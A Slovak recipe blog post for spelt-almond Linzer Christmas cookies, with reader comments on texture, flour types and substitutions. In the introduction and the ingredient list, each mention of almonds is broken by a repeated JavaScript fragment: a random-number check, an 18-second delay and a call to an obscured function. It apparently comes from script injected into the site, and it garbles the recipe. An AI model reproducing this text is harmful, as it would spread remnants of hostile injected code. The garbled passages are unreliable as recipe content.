Špaldovo-mandľové linecké koláčiky

Linecké koláčiky. Kto by ich nemiloval. U nás doma na Vianoce nesmú chýbať. Tento recept vznikol nedávno, keď sme s maminou premýšľali nad tým, ako náš recept tento rok vylepšiť. A tak sme sa trošku pohrali s množstvami a vznikli naše špaldovo – mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľové, na nerozoznanie od originálu. Dokonca ani muscovado cukor nenarobí šarapatu 😀 Tak, ak máte čas a chuť skúsiť ich, smelo do toho, budem sa veľmi tešiť.

Ingrediencie

  • 500g špaldovej hladkej múky
  • 200 g pomletých mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlí (alebo mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľových lupienkov pomletých na elektrickom kávovom mlynčeku na jemno ako hladká múka, preosejte aby tam nezostali žiadne veľké kúsky ), nepoužívajte mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľovú múku
  • štipka himalájskej soli
  • 250 g studeného masla 84%
  • 150 g pomletého trstinového (meliem tiež na elektrickom kávovom mlynčeku) alebo muscovado cukru (cesto s ním bolo fantasticky vláčne a veľmi dobre sa s ním pracovalo)
  • Kôra a šťava z 1 bio citrónu stredne veľkého
  • 4 žĺtka (bielky si pekne odložte na makrónky 😀 )

Postup

  1. Všetky ingrediencie dôkladne odvážime a zmiešame v miske rukami na kompaktné cesto. Ono to na začiatku bude vyzerať tak, že z toho nikdy cesto nebude, ale netreba sa vzdávať. Maslo sa bude pod rukami postupne topiť a vytvoríte úžasne hladké a vláčne cesto , s ktorým je radosť pracovať.
    TIP od mojej maminky: studené maslo nastrúhajte na hrubom strúhadle, bude sa vám ľahšie spracovávať s múkou.
  2. Keď sa vám začne cesto pekne spájať dokopy, vyklopte ho na dosku, rozdeľte na 3 časti a poriadne každú guličku premieste a 2 z nich zabaľte do potravinárskej fólie a odložte do chladničky. Tretiu časť si položte na dosku pokrytú potravinárskou fóliou a zakryte ju druhou časťou potravinárskej fólie a vyvaľkajte. Ľahšie sa aj odlepujú vykrojené vzory, keď ich prenášam na plech.
  3. Cesto vyvaľkáme na cca 2-3 mm, alebo podľa toho, ako ste doma zvyknutí. Ja mám rada, keď sú tenučké a trošku skaramelizované a preto si jeden plech vždy nechám trošku dlhšie v rúre, nech sú trošku viac zlatavé.
  4. Pečieme vo vyhriatej rúre na 180 stupňov 6 – 9 minút. Podľa hrúbky cesta. Tenšie potrebujú menej času, ako hrubšie. Ono to zistíte po prvom plechu, ako vám pečie rúra, tak jej všetko prispôsobte. Ja napríklad aj medovníčky, aj linecké musím piecť vo vrchnej tretine rúry, inak sa mi zo spodu pripečú o dosť skôr, ako stihnú zozlatnúť z vrchnej strany.
  5. Upečené linecké koláčiky necháme vychladnúť na plechu a studené ich spájame lekvárom, alebo džemom podľa vlastného výberu. Ja mám rada malinový, šípkový, ríbezľový , alebo jahodový. Hotové linecké koláčiky odložíme do uzatvárateľnej nádoby a papkáme počas vianočných sviatkov 😀

Dobrú chuť vám želááám!
Vaša Miriam :-*
Ohodnoť Recept

19 komentárov

  1. Práve som ich dopiekla..nemala som doma dostatok bielej špaldovej múky, takže som to skombinovala s celozrnnou 50:50. Aj napriek tomu všetkým doma chutia! Najsamsuper je na nich to, že vôbec nie sú presladené. Práve naopak, ten citrón ich krásne osviežil! S vaľkaním je babračka, mne to bez fólie ani nešlo (takže ju určite odporúčam pužiť), ale stoja za to 🙂 Ďakujem za recept a zakladám k mojim vianočným 😉

     
    • No perfektne!!! Veľmi sa teším ? Celozrnná asi trošku viac popila tekutiny, preto to asi išlo horšie vaľkať 🙂 V každom prípade veeeľmi ďakujem za spätnú väzbu :-* podzravujem a želám kráásne Vianoce 🙂

       
  2. Aj ja som ich dnes napiekla, ja som použila špaldovú celozrnnú múku Biomila, myslela som, že špaldová je len celozrnná, cesto bolo v pohode, vaľkala som to s fóliou, trochu som sa potrápila 🙂 teraz sa ich chystám plniť, zatiaľ sa mi zdajú dosť tvrdé, tak verím, že od džemu zmäknú. Inak chutia výborne, nie sú presladené a ten citrón im dodáva správnu kyslosť. Ďakujem za skvelý recept a budem sa inšpirovať aj naďalej. Ešte skúsim aj grilážky 🙂 Prajem krásne Vianoce 🙂

     
    • no ono z tej celozrnnej asi su tvrdsie, lebo ta popije vzdy viac tekutin, ako hladka spaldova…ale urcite s dzemom zmaknu 🙂 dakujem za doveru :*

       
  3. Mirka, dakujem za uzasny recept, nevahala som a tento rok konecne urobila linecke podla mojich predstav vdaka Tvojmu recpetu 🙂 chutia skvele aj napriek tomu, ze som namiesala aj celozrnnu spadlovu muku, s jahodovym a sipkovym dzemom 🙂 a dnes uz mame len tri kusy odlozene pre dcerku, ked sa zobudi 😉 dakujeme, urcite pri nich zostaneme aj buduci rok a tesime sa na nove uzasne receptiky v Tvojom podani 🙂

     
    • Jeeeej, dakujem krasne za spatnu vazbu!!! Ospravedlnujem sa, ze az teraz reagujem 🙂 Velmi si vazim taketo mile spravicky…velmi dakujem a zelam vsetko len to najlepsie v novom roku :-* A dobruuu chut 😀

       
  4. Su fantastickeeeeee..dnes sme ich robili so syncekom (4r.) Take velkonocneee..velmi mu chutili a mala som co robit aby ich hned nepojedol..vravel ze su najlepsieee..tak dakujeme a ideme skusit nieco z dalsich receptov

     
    • No paradickaaaaaa 😀 velka radost je aj na mojej strane 😀 😀 daj vediet potom, ze ako 😀

       
  5. Famozne su, musime sa vemi ovladam aby sme ich nezjedli vsetky v jede den:) dakujeme za recept z so ho odporucala dalsim:)

     
    • Jej Lucinka :-* Dakujem krasne za pochvalu 😀 My ich tiez milujeme…dobre, ze si mi pripomenula…urobim ich..priznam sa, ze pocas sviatkov vianocnych som ich naplnila len raz…kvoli fotke…inak som nestihala, ako rychlo sa minali vzdy 😀

       
  6. Ja som urobila cesto ale je také zvláštne drolive a tuhšie. Aj sa celkom zle veľká. Držala som sa presne receptu.

     
    • skusala si cez foliu valkat? Maslo 82 percentne? Niekedy moze byt ina savost muky pri roznych znackach…mne sa s cestom vzdy skvelo robilo…mandlove lupienky si mlela na kavovom mlynceku na prach?

       
      • Áno, maslo som použila Rajo a valkala cez fóliu, ale rozmýšľam, či som nedala malo citrónovej šťavy. Môžu to byť príčina? Mandle som použila mleté z Lidla.Inak sú úžasné krehké a chutné, som sa bála, že budú tvrdé, ale rada by som prišla na príčinu do budúcna, prečo nebolo cesto vláčne a mäkké. …

         
      • A inak je pravda,že túto hladkú spaldovu som použila prvý raz.je to značka Laura mlyn.

         
        • nooo….moze byt aj malo citronovej stavy dovodom…su vynikajuce chutovo…krehulinke su…ja este mandle pomlete meliem s trstinacom v kavovom mlynceku, nech je to este jemnejsie 🙂

           
  7. Ahoj,moze sa pouzit aj kokosovy cukor namiesto trstinoveho?Chystam sa vyskusat 😉 Vdaka

     
  8. Ahoj Miriam, chcela by som vyskúšať tvoje koláčiky, mám jednu otázku – tie mandle môžu byť aj so šupkou?

     

Napíš Koment

Vaša e-mailová adresa nebude zverejnená.

*